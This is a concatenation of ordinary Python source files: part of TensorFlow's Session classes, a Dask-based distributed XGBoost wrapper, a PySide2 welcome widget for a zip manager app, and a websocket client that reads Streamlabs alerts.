proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
return ret
def __del__(self):
# NOTE(mrry): It is possible that `self._session.__del__()` could be
# called before this destructor, in which case `self._session._session`
# will be `None`.
if (self._handle is not None and self._session._session is not None and
not self._session._closed):
tf_session.TF_SessionReleaseCallable(self._session._session,
self._handle)
# pylint: enable=protected-access
# TODO(b/74355905): Reimplement `Session.make_callable()` using this method
# where possible.
def _make_callable_from_options(self, callable_options):
"""Returns a handle to a "callable" with the given options.
Args:
callable_options: A `CallableOptions` protocol buffer message describing
the computation that will be performed by the callable.
Returns:
A handle to the new callable.
"""
self._extend_graph()
return BaseSession._Callable(self, callable_options)
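# Hedged sketch of the `CallableOptions` path above (field names assumed from
# `config_pb2.CallableOptions`; the tensors `x`/`y` and the dtype are
# illustrative, and this is private API rather than a supported entry point):
#
#   from tensorflow.core.protobuf import config_pb2
#   opts = config_pb2.CallableOptions()
#   opts.feed.append(x.name)
#   opts.fetch.append(y.name)
#   step = sess._make_callable_from_options(opts)
#   step(np.array([1.0, 2.0], dtype=np.float32))  # -> list of fetched arrays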
@tf_export(v1=['Session'])
class Session(BaseSession):
"""A class for running TensorFlow operations.
A `Session` object encapsulates the environment in which `Operation`
objects are executed, and `Tensor` objects are evaluated. For
example:
```python
tf.compat.v1.disable_eager_execution() # need to disable eager in TF2.x
# Build a graph.
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# Launch the graph in a session.
sess = tf.compat.v1.Session()
# Evaluate the tensor `c`.
print(sess.run(c)) # prints 30.0
```
A session may own resources, such as
`tf.Variable`, `tf.queue.QueueBase`,
and `tf.compat.v1.ReaderBase`. It is important to release
these resources when they are no longer required. To do this, either
invoke the `tf.Session.close` method on the session, or use
the session as a context manager. The following two examples are
equivalent:
```python
# Using the `close()` method.
sess = tf.compat.v1.Session()
sess.run(...)
sess.close()
# Using the context manager.
with tf.compat.v1.Session() as sess:
sess.run(...)
```
The
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer exposes various configuration options for a
session. For example, to create a session that uses soft constraints
for device placement, and log the resulting placement decisions,
create a session as follows:
```python
# Launch the graph in a session that allows soft device placement and
# logs the placement decisions.
sess = tf.compat.v1.Session(config=tf.compat.v1.ConfigProto(
allow_soft_placement=True,
log_device_placement=True))
```
"""
def __init__(self, target='', graph=None, config=None):
"""Creates a new TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine. See
[Distributed TensorFlow](https://tensorflow.org/deploy/distributed) for
more examples.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional.) A
[`ConfigProto`](https://www.tensorflow.org/code/tensorflow/core/protobuf/config.proto)
protocol buffer with configuration options for the session.
"""
super(Session, self).__init__(target, graph, config=config)
# NOTE(mrry): Create these on first `__enter__` to avoid a reference cycle.
self._default_graph_context_manager = None
self._default_session_context_manager = None
def __enter__(self):
if self._default_graph_context_manager is None:
self._default_graph_context_manager = self.graph.as_default()
else:
raise RuntimeError('Session context managers are not re-entrant. '
'Use `Session.as_default()` if you want to enter '
'a session multiple times.')
if self._default_session_context_manager is None:
self._default_session_context_manager = self.as_default()
self._default_graph_context_manager.__enter__()
return self._default_session_context_manager.__enter__()
def __exit__(self, exec_type, exec_value, exec_tb):
if exec_type is errors.OpError:
logging.error('Session closing due to OpError: %s', (exec_value,))
try:
self._default_session_context_manager.__exit__(exec_type, exec_value,
exec_tb)
except RuntimeError as error:
if error == exec_value:
# NOTE(skyewm): for some reason, in Python3,
# _default_session_context_manager.__exit__ will re-raise the "not
# re-entrant" exception raised in __enter__ above (note that if we're
# here, we're in the outer session context manager, since __exit__ is
# not called when __enter__ raises an exception). We still want to
# continue cleaning up this context manager before the exception is
# further propagated, so we ignore it here (note that it'll continue
# being propagated after this method completes).
pass
else:
raise
self._default_graph_context_manager.__exit__(exec_type, exec_value, exec_tb)
self._default_session_context_manager = None
self._default_graph_context_manager = None
# If we are closing due to an exception, set a time limit on our Close() to
# avoid blocking forever.
# TODO(b/120204635) remove this when deadlock is fixed.
if exec_type:
close_thread = threading.Thread(
name='SessionCloseThread', target=self.close)
close_thread.daemon = True
close_thread.start()
close_thread.join(30.0)
if close_thread.is_alive():
logging.error(
'Session failed to close after 30 seconds. Continuing after this '
'point may leave your program in an undefined state.')
else:
self.close()
@staticmethod
def reset(target, containers=None, config=None):
"""Resets resource containers on `target`, and close all connected sessions.
A resource container is distributed across all workers in the
same cluster as `target`. When a resource container on `target`
is reset, resources associated with that container will be cleared.
In particular, all Variables in the container will become undefined:
they lose their values and shapes.
NOTE:
(i) reset() is currently only implemented for distributed sessions.
(ii) Any sessions on the master named by `target` will be closed.
If no resource containers are provided, all containers are reset.
Args:
target: The execution engine to connect to.
containers: A list of resource container name strings, or `None` if all of
the containers are to be reset.
config: (Optional.) Protocol buffer with configuration options.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
resetting containers.
"""
if target is not None:
target = compat.as_bytes(target)
if containers is not None:
containers = [compat.as_bytes(c) for c in containers]
else:
containers = []
tf_session.TF_Reset(target, containers, config)
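# Hedged usage sketch for `reset()` (distributed sessions only; the gRPC
# target and container name below are illustrative):
#
#   tf.compat.v1.Session.reset("grpc://worker0.example.com:2222",
#                              containers=["experiment0"])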
@tf_export(v1=['InteractiveSession'])
class InteractiveSession(BaseSession):
"""A TensorFlow `Session` for use in interactive contexts, such as a shell.
The only difference with a regular `Session` is that an `InteractiveSession`
installs itself as the default session on construction.
The methods `tf.Tensor.eval`
and `tf.Operation.run`
will use that session to run ops.
This is convenient in interactive shells and [IPython
notebooks](http://ipython.org), as it avoids having to pass an explicit
`Session` object to run ops.
For example:
```python
sess = tf.compat.v1.InteractiveSession()
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
# We can just use 'c.eval()' without passing 'sess'
print(c.eval())
sess.close()
```
Note that a regular session installs itself as the default session when it
is created in a `with` statement. The common usage in non-interactive
programs is to follow that pattern:
```python
a = tf.constant(5.0)
b = tf.constant(6.0)
c = a * b
with tf.compat.v1.Session():
# We can also use 'c.eval()' here.
print(c.eval())
```
"""
_count_lock = threading.Lock()
_active_session_count = 0 # GUARDED_BY(_count_lock)
def __init__(self, target='', graph=None, config=None):
"""Creates a new interactive TensorFlow session.
If no `graph` argument is specified when constructing the session,
the default graph will be launched in the session. If you are
using more than one graph (created with `tf.Graph()`) in the same
process, you will have to use different sessions for each graph,
but each graph can be used in multiple sessions. In this case, it
is often clearer to pass the graph to be launched explicitly to
the session constructor.
Args:
target: (Optional.) The execution engine to connect to. Defaults to using
an in-process engine.
graph: (Optional.) The `Graph` to be launched (described above).
config: (Optional) `ConfigProto` proto used to configure the session.
"""
if not config:
# If config is not provided, choose some reasonable defaults for
# interactive use:
#
# - Grow GPU memory as needed at the cost of fragmentation.
gpu_options = config_pb2.GPUOptions(allow_growth=True)
config = config_pb2.ConfigProto(gpu_options=gpu_options)
# Interactive sessions always place pruned graphs.
config.graph_options.place_pruned_graph = True
super(InteractiveSession, self).__init__(target, graph, config)
with InteractiveSession._count_lock:
if InteractiveSession._active_session_count > 0:
warnings.warn('An interactive session is already active. This can '
'cause out-of-memory errors in some cases. You must '
'explicitly call `InteractiveSession.close()` to release '
'resources held by the other session(s).')
InteractiveSession._active_session_count += 1
# NOTE(mrry): We do not use `Session._closed` here because it has unhelpful
# semantics (in particular, it is not set to true if `Session.close()` is
# called on a session that has not been "opened" by running a step) and we
# cannot change those semantics without breaking existing code.
self._explicitly_closed = False
self._default_session = self.as_default()
self._default_session.enforce_nesting = False
self._default_session.__enter__()
self._explicit_graph = graph
if self._explicit_graph is not None:
self._default_graph = graph.as_default()
self._default_graph.enforce_nesting = False
self._default_graph.__enter__()
def close(self):
"""Closes an `InteractiveSession`."""
super(InteractiveSession, self).close()
with InteractiveSession._count_lock:
if not self._explicitly_closed:
InteractiveSession._active_session_count -= 1
self._explicitly_closed = True
else:
return
if self._explicit_graph is not None:
self._default_graph.__exit__(None, None, None)
self._default_graph = None
self._default_session.__exit__(None, None, None)
self._default_session = None
|
core.py
|
import logging
from collections import defaultdict
from threading import Thread
import dask.array as da
import dask.dataframe as dd
import numpy as np
import pandas as pd
import xgboost as xgb
from dask import delayed
from dask.distributed import default_client, wait
from toolz import assoc, first
from tornado import gen
from .tracker import RabitTracker
try:
import sparse
import scipy.sparse as ss
except ImportError:
sparse = False
ss = False
logger = logging.getLogger(__name__)
def parse_host_port(address):
if "://" in address:
address = address.rsplit("://", 1)[1]
host, port = address.split(":")
port = int(port)
return host, port
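def _example_parse_host_port():
    # Illustrative check, not part of the original module: a Dask scheduler
    # address with or without a scheme reduces to a (host, port) tuple.
    assert parse_host_port("tcp://127.0.0.1:8786") == ("127.0.0.1", 8786)
    assert parse_host_port("127.0.0.1:8786") == ("127.0.0.1", 8786)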
def start_tracker(host, n_workers):
""" Start Rabit tracker """
env = {"DMLC_NUM_WORKER": n_workers}
rabit = RabitTracker(hostIP=host, nslave=n_workers)
env.update(rabit.slave_envs())
rabit.start(n_workers)
logger.info("Starting Rabit Tracker")
thread = Thread(target=rabit.join)
thread.daemon = True
thread.start()
return env
def concat(L):
if isinstance(L[0], np.ndarray):
return np.concatenate(L, axis=0)
elif isinstance(L[0], (pd.DataFrame, pd.Series)):
return pd.concat(L, axis=0)
elif ss and isinstance(L[0], ss.spmatrix):
return ss.vstack(L, format="csr")
elif sparse and isinstance(L[0], sparse.SparseArray):
return sparse.concatenate(L, axis=0)
else:
raise TypeError(
"Data must be either numpy arrays or pandas dataframes"
". Got %s" % type(L[0])
)
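def _example_concat():
    # Illustrative check, not part of the original module: ``concat``
    # dispatches on the type of the first part, so parts must share one type.
    assert concat([np.array([1, 2]), np.array([3, 4])]).tolist() == [1, 2, 3, 4]
    frames = [pd.DataFrame({"a": [1]}), pd.DataFrame({"a": [2]})]
    assert list(concat(frames)["a"]) == [1, 2]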
def train_part(
env,
param,
list_of_parts,
dmatrix_kwargs=None,
eval_set=None,
missing=None,
n_jobs=None,
sample_weight_eval_set=None,
**kwargs
):
"""
Run part of XGBoost distributed workload
This starts an xgboost.rabit slave, trains on provided data, and then shuts
down the xgboost.rabit slave
Returns
-------
model if rank zero, None otherwise
"""
data, labels = zip(*list_of_parts) # Prepare data
data = concat(data) # Concatenate many parts into one
labels = concat(labels)
if dmatrix_kwargs is None:
dmatrix_kwargs = {}
dmatrix_kwargs["feature_names"] = getattr(data, "columns", None)
dtrain = xgb.DMatrix(data, labels, **dmatrix_kwargs)
evals = _package_evals(
eval_set,
sample_weight_eval_set=sample_weight_eval_set,
missing=missing,
n_jobs=n_jobs,
)
args = [("%s=%s" % item).encode() for item in env.items()]
xgb.rabit.init(args)
try:
logger.info("Starting Rabit, Rank %d", xgb.rabit.get_rank())
bst = xgb.train(param, dtrain, evals=evals, **kwargs)
if xgb.rabit.get_rank() == 0: # Only return from one worker
result = bst
else:
result = None
finally:
xgb.rabit.finalize()
return result
def _package_evals(
eval_set, sample_weight_eval_set=None, missing=None, n_jobs=None
):
if eval_set is not None:
if sample_weight_eval_set is None:
sample_weight_eval_set = [None] * len(eval_set)
evals = list(
xgb.DMatrix(
data,
label=label,
missing=missing,
weight=weight,
nthread=n_jobs,
)
for ((data, label), weight) in zip(
eval_set, sample_weight_eval_set
)
)
evals = list(
zip(evals, ["validation_{}".format(i) for i in range(len(evals))])
)
else:
evals = ()
return evals
@gen.coroutine
def _train(client, params, data, labels, dmatrix_kwargs={}, **kwargs):
"""
Asynchronous version of train
See Also
--------
train
"""
# Break apart Dask.array/dataframe into chunks/parts
data_parts = data.to_delayed()
label_parts = labels.to_delayed()
if isinstance(data_parts, np.ndarray):
assert data_parts.shape[1] == 1
data_parts = data_parts.flatten().tolist()
if isinstance(label_parts, np.ndarray):
assert label_parts.ndim == 1 or label_parts.shape[1] == 1
label_parts = label_parts.flatten().tolist()
# Arrange parts into pairs. This enforces co-locality
parts = list(map(delayed, zip(data_parts, label_parts)))
parts = client.compute(parts) # Start computation in the background
yield wait(parts)
for part in parts:
if part.status == "error":
yield part # trigger error locally
# Because XGBoost-python doesn't yet allow iterative training, we need to
# find the locations of all chunks and map them to particular Dask workers
key_to_part_dict = dict([(part.key, part) for part in parts])
who_has = yield client.scheduler.who_has(keys=[part.key for part in parts])
worker_map = defaultdict(list)
for key, workers in who_has.items():
worker_map[first(workers)].append(key_to_part_dict[key])
ncores = yield client.scheduler.ncores() # Number of cores per worker
# Start the XGBoost tracker on the Dask scheduler
host, port = parse_host_port(client.scheduler.address)
env = yield client._run_on_scheduler(
start_tracker, host.strip("/:"), len(worker_map)
)
# Tell each worker to train on the chunks/parts that it has locally
futures = [
client.submit(
train_part,
env,
assoc(params, "nthread", ncores[worker]),
list_of_parts,
workers=worker,
dmatrix_kwargs=dmatrix_kwargs,
**kwargs
)
for worker, list_of_parts in worker_map.items()
]
# Get the results, only one will be non-None
results = yield client._gather(futures)
result = [v for v in results if v][0]
num_class = params.get("num_class")
if num_class:
result.set_attr(num_class=str(num_class))
raise gen.Return(result)
def train(client, params, data, labels, dmatrix_kwargs={}, **kwargs):
""" Train an XGBoost model on a Dask Cluster
This starts XGBoost on all Dask workers, moves input data to those workers,
and then calls ``xgboost.train`` on the inputs.
Parameters
----------
client: dask.distributed.Client
params: dict
Parameters to give to XGBoost (see xgb.Booster.train)
data: dask array or dask.dataframe
labels: dask.array or dask.dataframe
dmatrix_kwargs: Keywords to give to Xgboost DMatrix
**kwargs: Keywords to give to XGBoost train
Examples
--------
>>> client = Client('scheduler-address:8786') # doctest: +SKIP
>>> data = dd.read_csv('s3://...') # doctest: +SKIP
>>> labels = data['outcome'] # doctest: +SKIP
>>> del data['outcome'] # doctest: +SKIP
>>> train(client, params, data, labels, **normal_kwargs) # doctest: +SKIP
<xgboost.core.Booster object at ...>
See Also
--------
predict
"""
return client.sync(
_train, client, params, data, labels, dmatrix_kwargs, **kwargs
)
def _predict_part(part, model=None):
xgb.rabit.init()
try:
dm = xgb.DMatrix(part)
result = model.predict(dm)
finally:
xgb.rabit.finalize()
if isinstance(part, pd.DataFrame):
if model.attr("num_class"):
result = pd.DataFrame(result, index=part.index)
else:
result = pd.Series(result, index=part.index, name="predictions")
return result
def predict(client, model, data):
""" Distributed prediction with XGBoost
Parameters
----------
client: dask.distributed.Client
model: xgboost.Booster
data: dask array or dataframe
Examples
--------
>>> client = Client('scheduler-address:8786') # doctest: +SKIP
>>> test_data = dd.read_csv('s3://...') # doctest: +SKIP
>>> model
<xgboost.core.Booster object at ...>
>>> predictions = predict(client, model, test_data) # doctest: +SKIP
Returns
-------
Dask.dataframe or dask.array, depending on the input data type
See Also
--------
train
"""
if isinstance(data, dd._Frame):
result = data.map_partitions(_predict_part, model=model)
result = result.values
elif isinstance(data, da.Array):
num_class = model.attr("num_class") or 2
num_class = int(num_class)
if num_class > 2:
kwargs = dict(
drop_axis=None, chunks=(data.chunks[0], (num_class,))
)
else:
kwargs = dict(drop_axis=1)
result = data.map_blocks(
_predict_part, model=model, dtype=np.float32, **kwargs
)
return result
class XGBRegressor(xgb.XGBRegressor):
def fit(
self,
X,
y=None,
eval_set=None,
sample_weight_eval_set=None,
eval_metric=None,
early_stopping_rounds=None,
):
"""Fit the gradient boosting model
Parameters
----------
X : array-like [n_samples, n_features]
y : array-like
eval_set : list, optional
A list of (X, y) tuple pairs to use as validation sets, for which
metrics will be computed.
Validation metrics will help us track the performance of the model.
sample_weight_eval_set : list, optional
A list of the form [L_1, L_2, ..., L_n], where each L_i is a list
of instance weights on the i-th validation set.
eval_metric : str, list of str, or callable, optional
If a str, should be a built-in evaluation metric to use. See
`doc/parameter.rst <https://github.com/dmlc/xgboost/blob/master/doc/parameter.rst>`_. # noqa: E501
If a list of str, should be the list of multiple built-in
evaluation metrics to use.
If callable, a custom evaluation metric. The call
signature is ``func(y_predicted, y_true)`` where ``y_true`` will
be a DMatrix object such that you may need to call the
``get_label`` method. It must return a str, value pair where
the str is a name for the evaluation and value is the value of
the evaluation function. The callable custom objective is always
minimized.
early_stopping_rounds : int
Activates early stopping. Validation metric needs to improve at
least once in every **early_stopping_rounds** round(s) to continue
training.
Requires at least one item in **eval_set**.
The method returns the model from the last iteration (not the best
one).
If there's more than one item in **eval_set**, the last entry will
be used for early stopping.
If there's more than one metric in **eval_metric**, the last
metric will be used for early stopping.
If early stopping occurs, the model will have three additional
fields:
``clf.best_score``, ``clf.best_iteration`` and
``clf.best_ntree_limit``.
Returns
-------
self : the fitted Regressor
Notes
-----
This differs from the XGBoost version in that the ``sample_weight`` and
``verbose`` fit kwargs are not supported.
"""
client = default_client()
xgb_options = self.get_xgb_params()
if eval_metric is not None:
if callable(eval_metric):
eval_metric = None
else:
xgb_options.update({"eval_metric": eval_metric})
self._Booster = train(
client,
xgb_options,
X,
y,
num_boost_round=self.n_estimators,
eval_set=eval_set,
missing=self.missing,
n_jobs=self.n_jobs,
early_stopping_rounds=early_stopping_rounds,
)
if early_stopping_rounds is not None:
self.best_score = self._Booster.best_score
self.best_iteration = self._Booster.best_iteration
self.best_ntree_limit = self._Booster.best_ntree_limit
return self
def predict(self, X):
client = default_client()
return predict(client, self._Booster, X)
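# Hedged usage sketch (requires a running dask.distributed cluster; the
# scheduler address, shapes and chunk sizes are illustrative assumptions):
#
#   from dask.distributed import Client
#   import dask.array as da
#   client = Client("scheduler-address:8786")   # becomes the default client
#   X = da.random.random((1000, 10), chunks=(100, 10))
#   y = da.random.random(1000, chunks=100)
#   est = XGBRegressor(n_estimators=10)
#   est.fit(X, y)           # trains through the distributed `train` above
#   preds = est.predict(X)  # lazy dask array of predictions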
class XGBClassifier(xgb.XGBClassifier):
def fit(
self,
X,
y=None,
classes=None,
eval_set=None,
sample_weight_eval_set=None,
eval_metric=None,
early_stopping_rounds=None,
):
"""Fit a gradient boosting classifier
Parameters
----------
X : array-like [n_samples, n_features]
Feature Matrix. May be a dask.array or dask.dataframe
y : array-like
Labels
eval_set : list, optional
A list of (X, y) tuple pairs to use as validation sets, for which
metrics will be computed.
Validation metrics will help us track the performance of the model.
sample_weight_eval_set : list, optional
A list of the form [L_1, L_2, ..., L_n], where each L_i is a list
of instance weights on the i-th validation set.
eval_metric : str, list of str, or callable, optional
If a str, should be a built-in evaluation metric to use. See
`doc/parameter.rst <https://github.com/dmlc/xgboost/blob/master/doc/parameter.rst>`_. # noqa: E501
If a list of str, should be the list of multiple built-in
evaluation metrics to use.
If callable, a custom evaluation metric. The call
signature is ``func(y_predicted, y_true)`` where ``y_true`` will
be a DMatrix object such that you may need to call the
``get_label`` method. It must return a str, value pair where
the str is a name for the evaluation and value is the value of
the evaluation function. The callable custom objective is always
minimized.
early_stopping_rounds : int
Activates early stopping. Validation metric needs to improve at
least once in every **early_stopping_rounds** round(s) to continue
training.
Requires at least one item in **eval_set**.
The method returns the model from the last iteration (not the best
one).
If there's more than one item in **eval_set**, the last entry will
be used for early stopping.
If there's more than one metric in **eval_metric**, the last
metric will be used for early stopping.
If early stopping occurs, the model will have three additional
fields:
``clf.best_score``, ``clf.best_iteration`` and
``clf.best_ntree_limit``.
classes : sequence, optional
The unique values in `y`. If not specified, this will be
eagerly computed from `y` before training.
Returns
-------
self : XGBClassifier
Notes
-----
This differs from the XGBoost version in three ways
1. The ``sample_weight`` and ``verbose`` fit kwargs are not
supported.
2. The labels are not automatically label-encoded
3. The ``classes_`` and ``n_classes_`` attributes are not learned
"""
client = default_client()
if classes is None:
if isinstance(y, da.Array):
classes = da.unique(y)
else:
classes = y.unique()
classes = classes.compute()
else:
classes = np.asarray(classes)
self.classes_ = classes
self.n_classes_ = len(self.classes_)
xgb_options = self.get_xgb_params()
if eval_metric is not None:
if callable(eval_metric):
eval_metric = None
else:
xgb_options.update({"eval_metric": eval_metric})
if self.n_classes_ > 2:
# xgboost just ignores the user-provided objective
# We only overwrite if it's the default...
if xgb_options["objective"] == "binary:logistic":
xgb_options["objective"] = "multi:softprob"
xgb_options.setdefault("num_class", self.n_classes_)
# xgboost sets this to self.objective, which I think is wrong
# hyper-parameters should not be updated during fit.
self.objective = xgb_options["objective"]
# TODO: auto label-encode y
# that will require a dependency on dask-ml
# TODO: sample weight
self._Booster = train(
client,
xgb_options,
X,
y,
num_boost_round=self.n_estimators,
eval_set=eval_set,
missing=self.missing,
n_jobs=self.n_jobs,
early_stopping_rounds=early_stopping_rounds,
)
if early_stopping_rounds is not None:
self.best_score = self._Booster.best_score
self.best_iteration = self._Booster.best_iteration
self.best_ntree_limit = self._Booster.best_ntree_limit
return self
def predict(self, X):
client = default_client()
class_probs = predict(client, self._Booster, X)
if class_probs.ndim > 1:
cidx = da.argmax(class_probs, axis=1)
else:
cidx = (class_probs > 0.5).astype(np.int64)
return cidx
def predict_proba(self, data, ntree_limit=None):
client = default_client()
if ntree_limit is not None:
raise NotImplementedError(
"'ntree_limit' is not currently " "supported."
)
class_probs = predict(client, self._Booster, data)
return class_probs
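# Hedged usage sketch for the classifier (same cluster assumptions as the
# regressor sketch above; passing `classes` avoids the eager `unique` pass
# over `y`):
#
#   clf = XGBClassifier(n_estimators=10)
#   clf.fit(X, (y > 0.5).astype(int), classes=[0, 1])
#   labels = clf.predict(X)        # dask array of class indices
#   probs = clf.predict_proba(X)   # dask array of probabilities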
|
Welcome.py
|
from PySide2 import QtWidgets, QtCore, QtGui
import PySide2
from Updater import checkForUpdates
from urllib.request import urlopen
from threading import Thread
from Tools import *
#from Tools import log, debugging, _platform, getFileIcon, getPath, openOnExplorer, notify, settings, version, openSettingsWindow
class Welcome(QtWidgets.QWidget):
loadPixmapSignal = QtCore.Signal(bytes)
def __init__(self, parent=None):
super().__init__(parent=parent)
self.compressButton = QtWidgets.QPushButton(self)
self.compressButton.clicked.connect(lambda: self.window().addCompressTab())
self.compressButton.resize(128, 128)
self.compressButton.setIcon(QtGui.QIcon(getPath("compressFiles.ico")))
self.compressButton.setIconSize(QtCore.QSize(96, 96))
self.extractButton = QtWidgets.QPushButton(self)
self.extractButton.clicked.connect(lambda: self.window().addExtractTab())
self.extractButton.setIcon(QtGui.QIcon(getPath("extractFiles.ico")))
self.extractButton.resize(128, 128)
self.extractButton.setIconSize(QtCore.QSize(96, 96))
self.infoLabel = QtWidgets.QLabel(self)
self.infoLabel.setText(f"SomePythonThings Zip Manager v{version} © 2021 The SomePythonThings Project")
self.checkForUpdatesButton = QtWidgets.QPushButton(self)
self.checkForUpdatesButton.setText("Check for updates...")
self.checkForUpdatesButton.setFixedWidth(150)
self.checkForUpdatesButton.setFixedHeight(25)
self.checkForUpdatesButton.clicked.connect(lambda: checkForUpdates(self.window(), verbose=True))
self.settingsButton = QtWidgets.QPushButton(self)
self.settingsButton.setText("Settings...")
self.settingsButton.clicked.connect(lambda: openSettingsWindow(self.window()))
self.settingsButton.setFixedHeight(25)
self.settingsButton.setFixedWidth(100)
self.compressLabel = QtWidgets.QLabel(self)
self.compressLabel.setText("Compress Files")
self.compressLabel.setAlignment(QtCore.Qt.AlignCenter)
self.compressLabel.resize(128, 25)
self.extractLabel = QtWidgets.QLabel(self)
self.extractLabel.setText("Extract Files")
self.extractLabel.setAlignment(QtCore.Qt.AlignCenter)
self.extractLabel.resize(128, 25)
self.bannerLabel = QtWidgets.QLabel()
#self.bannerLabel.resize(700, 200)
self.bannerLabel.setAlignment(QtCore.Qt.AlignCenter)
self.bannerLabel.setText("Welcome to SomePythonThings Zip Manager! We are now loading internet info...")
self.scrollLayout = QtWidgets.QGridLayout(self)
self.scrollLayout.addWidget(self.bannerLabel)
self.scrollabreArea = QtWidgets.QScrollArea(self)
self.scrollabreArea.setWidgetResizable(True)
self.scrollabreArea.setWidget(self.bannerLabel)
self.bannerLabel.resize(1000, 1000)
self.pixmap = QtGui.QPixmap()
self.resizeEvent()
self.loadPixmapSignal.connect(self.showPic)
Thread(target=self.loadPicThread, daemon=True).start()
def showPic(self, data) -> None:
log("[ OK ] Showing banner...")
self.pixmap.loadFromData(data)
self.resizeEvent()
def loadPicThread(self) -> None:
log("[ ] Downloading banner...")
url = 'https://raw.githubusercontent.com/martinet101/SomePythonThings-Zip-Manager/master/media/live_banner.png'
data = urlopen(url).read()
self.loadPixmapSignal.emit(data)
def loadEvent(self, ok: bool) -> None:
if(ok):
self.bannerLabel.show()
else:
self.bannerLabel.setText("Unable to load news page :(\n\n Please check your internet connection and try again")
def resizeEvent(self, event: QtGui.QResizeEvent = None) -> None:
if(event):
super().resizeEvent(event)
w = self.width()
h = self.height()
self.compressButton.move(w//2-133, h//2-14)
self.extractButton.move(w//2+5, h//2-14)
self.infoLabel.move(10, h-25)
self.infoLabel.resize(1500, 24)
#self.banner.move(50, 50)
#self.banner.resize(w-100, h//2-64-50)
self.bannerLabel.setPixmap(self.pixmap.scaledToWidth(self.scrollabreArea.width()-20, QtCore.Qt.SmoothTransformation))
self.bannerLabel.setFixedHeight(self.pixmap.scaledToWidth(self.scrollabreArea.width()).height())
self.scrollabreArea.move(50, 50)
self.scrollabreArea.resize(w-100, h//2-64-50)
self.settingsButton.move(w-105, 5)
self.checkForUpdatesButton.move(w-155, h-30)
self.extractLabel.move(w//2+5, h//2+124)
self.compressLabel.move(w//2-133, h//2+124)
if(__name__=="__main__"):
import __init__
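# Hedged sketch of the pattern Welcome relies on above: download bytes on a
# worker thread, then hand them to the GUI thread through a Qt signal, because
# widgets and pixmaps must only be touched from the GUI thread. Names below
# are illustrative.
#
#   class Banner(QtWidgets.QLabel):
#       gotData = QtCore.Signal(bytes)
#
#       def __init__(self):
#           super().__init__()
#           self.gotData.connect(self.showData)   # delivered on the GUI thread
#           Thread(target=self.download, daemon=True).start()
#
#       def download(self):
#           self.gotData.emit(urlopen("https://example.com/banner.png").read())
#
#       def showData(self, data: bytes):
#           pixmap = QtGui.QPixmap()
#           pixmap.loadFromData(data)
#           self.setPixmap(pixmap)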
|
streamlabs.py
|
import json
import requests
import websockets
import asyncio
import threading
import queue
import arrow
import traceback
class NoWebsocketToken(Exception):
pass
class StreamlabsAPI(object):
def __init__(self):
self._alertbox_url = None
self._websocket_token = None
self._websocket_data = queue.Queue()
self._ping_interval = 25
self._last_ping_response = None
self._thread = None # type: threading.Thread
self._disconnected_event = threading.Event()
self._disconnected_event.set()
self._connected_event = threading.Event()
self._connected_event.clear()
@property
def connected_event(self):
return self._connected_event
@property
def disconnected_event(self):
return self._disconnected_event
def get_websocket_token(self, alertbox_url):
self._alertbox_url = alertbox_url
self._websocket_token = self._get_websocket_token()
if not self._websocket_token:
raise NoWebsocketToken()
def launch(self):
if self._thread is None or not self._thread.is_alive():
self._launch_background_thread()
# self.read_from_msglog("/Users/jeremy/Downloads/msglog.txt")
def get_websocket_data_blocking(self, timeout=None):
return self._websocket_data.get(timeout=timeout)
def read_from_msglog(self, file_path):
with open(file_path, 'r') as f:
for line in f.readlines():
if line == "\n":
continue
else:
try:
json_data = json.loads(line)
except json.JSONDecodeError:
print("failed to decode json")
continue
self._websocket_data.put(json_data)
def _get_websocket_token(self):
try:
token = self._alertbox_url.split("/")[-1]
token_url = "https://streamlabs.com/api/v5/io/info?token=" + token
valid_headers = {
"Host": "streamlabs.com",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0",
"Referer": self._alertbox_url,
}
try:
req = requests.get(token_url, headers=valid_headers)
except requests.exceptions.ConnectionError:
return None
if req.status_code != 200:
return None
try:
req_parsed = json.loads(req.text)
except json.JSONDecodeError:
return None
websocket_token = req_parsed['path'].split("=")[-1]
except Exception as e:
traceback.print_exc()
return None
return websocket_token
def _launch_background_thread(self):
def loop_in_thread(asyncio_loop):
asyncio.set_event_loop(asyncio_loop)
asyncio_loop.run_until_complete(self._run())
loop = asyncio.get_event_loop()
self._thread = threading.Thread(target=loop_in_thread, args=(loop,), daemon=True)
self._thread.start()
async def _run(self):
ws_url = "wss://aws-io.streamlabs.com:443/socket.io/?token=%s&EIO=3&transport=websocket" % self._websocket_token
async with websockets.connect(ws_url) as websocket:
self._disconnected_event.clear()
self._connected_event.set()
self._last_ping_response = arrow.now()
keepalive_task = asyncio.ensure_future(self._keepalive(websocket))
read_data_task = asyncio.ensure_future(self._read_data(websocket))
done, pending = await asyncio.wait(
[keepalive_task, read_data_task],
return_when=asyncio.FIRST_COMPLETED
)
for task in pending:
task.cancel()
self._connected_event.clear()
self._disconnected_event.set()
async def _keepalive(self, socket):
while 1:
print("sending keepalive")
await socket.send("2")
await asyncio.sleep(3)
diff = arrow.now() - self._last_ping_response
if diff.total_seconds() > 5:
raise RuntimeError("Ping failed")
await asyncio.sleep(self._ping_interval-3)
async def _read_data(self, socket):
while 1:
data = await socket.recv()
data = data.strip()
number = ""
while data and data[0].isnumeric():
number += data[0]
data = data[1:]
if number == "3":
self._last_ping_response = arrow.now()
if data:
try:
parsed_data = json.loads(data)
except json.JSONDecodeError:
print("unknown packet encountered")
continue
print(parsed_data)
if 'pingInterval' in parsed_data:
self._ping_interval = int(parsed_data['pingInterval']) / 1000
else:
self._websocket_data.put(parsed_data)
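# Hedged usage sketch (the alert-box URL is a placeholder; the consumer loop
# simply prints whatever socket.io payloads the background thread enqueues):
#
#   api = StreamlabsAPI()
#   api.get_websocket_token("https://streamlabs.com/alert-box/v3/<token>")
#   api.launch()
#   api.connected_event.wait(timeout=10)
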